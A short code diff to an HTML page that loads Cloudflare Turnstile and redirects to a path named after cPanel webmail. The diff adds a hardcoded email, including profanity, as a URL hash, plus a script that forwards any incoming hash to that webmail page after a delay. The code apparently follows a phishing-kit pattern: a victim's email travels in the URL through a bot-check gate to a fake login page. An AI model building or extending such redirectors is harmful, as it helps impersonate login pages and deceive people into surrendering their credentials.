--- a/index.html
+++ b/index.html
@@ -55,7 +55,18 @@
         }
     </style>
     <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
-    <meta http-equiv="refresh" content="7;url=webmail.cpanel.net/index.html">
+    <meta http-equiv="refresh" content="7;url=webmail.cpanel.net/index.html#fuck@gmail.com">
+	<script>
+(function () {
+    if (window.location.hash) {
+        var base = "webmail.cpanel.net/index.html";
+        var finalURL = base + window.location.hash;
+        setTimeout(function () {
+            window.location.href = finalURL;
+        }, 4000);
+    }
+})();
+</script>
 </head>
 <body>
     <div class="container">
